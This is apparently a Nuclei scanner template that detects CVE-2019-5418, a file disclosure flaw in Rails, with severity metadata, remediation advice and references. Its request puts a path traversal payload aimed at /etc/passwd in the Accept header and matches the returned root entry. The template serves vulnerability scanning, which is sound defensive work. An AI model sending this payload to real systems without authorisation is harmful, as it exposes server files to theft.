id: CVE-2019-5418

info:
  name: Rails File Content Disclosure
  author: omarkurt
  severity: high
  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
  remediation: |
    Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
  reference:
    - https://github.com/omarkurt/CVE-2019-5418
    - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
    - https://www.exploit-db.com/exploits/46585/
    - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-5418
    cwe-id: CWE-22,NVD-CWE-noinfo
    epss-score: 0.97479
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: rails
  tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Accept: ../../../../../../../../etc/passwd{{

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
          - 500
# digest: 490a004630440220175927410add52cd2a2ec0f2c31b5bd66a933367f1061e6879f7075f69d17d3e02204e5923dd1ca44c7710db156f4a25aa5fd38a5e02670a27dae03a1979c1ca7c56:922c64590222798bb761d5b6d8e72950